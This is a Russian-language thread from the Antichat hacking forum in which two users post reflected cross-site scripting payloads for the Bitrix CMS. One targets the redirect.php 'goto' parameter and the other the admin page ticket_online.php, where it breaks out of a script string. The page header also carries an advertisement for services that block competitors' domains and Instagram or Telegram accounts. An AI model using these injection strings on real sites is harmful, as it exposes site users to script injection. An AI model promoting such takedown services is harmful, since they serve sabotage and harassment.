Форум АНТИЧАТ - Кто ещё не знает про пассивную XSS в bitrix?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Кто ещё не знает про пассивную XSS в bitrix?

Опции темы

Поиск в этой теме

Опции просмотра

Кто ещё не знает про пассивную XSS в bitrix?

23.05.2006, 22:01

~~_kREveDKo_~~

Banned

Регистрация: 04.12.2005

Сообщений: 826

Провел на форуме:
5223479

Репутация: 3813

Кто ещё не знает про пассивную XSS в bitrix?

http://site.net/bitrix/redirect.php?event1=pofig&event2=pofig&event3=pofi g&goto="><h1>XSS
(или http://site.net/bitrix/"><h1>xexe)

ерунда, конечно, но всё-таки...
и я вновь и вновь извиняюсь, если это уже не свежая инфа...

30.11.2009, 18:32

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

тоже еще одна хсс в самой же админки после капчи
/bitrix/admin/ticket_online.php?ticket_id=1&owner_user_id=77&lan g=&online_auto_refresh=999&admin_section=N'},17);a lert()//

Последний раз редактировалось sabe; 30.11.2009 в 18:35..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
и ещё раз про автоответчики	silveran	Телефония и связь	0	18.04.2006 06:32
может знает кто этих людей	seeattact	Болталка	7	21.03.2006 19:09
Кто что знает про php.spb.ru чат, пишите сюда!	ntking	Чаты	38	03.09.2005 11:48
кто знает какуюнибуть бaгу в Voodoo Chat?????	RedPepper	Чаты	9	01.04.2005 14:07
Есть чат, кто о нем что знает?	Cnhfyybr	Чаты	11	30.12.2004 02:53

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход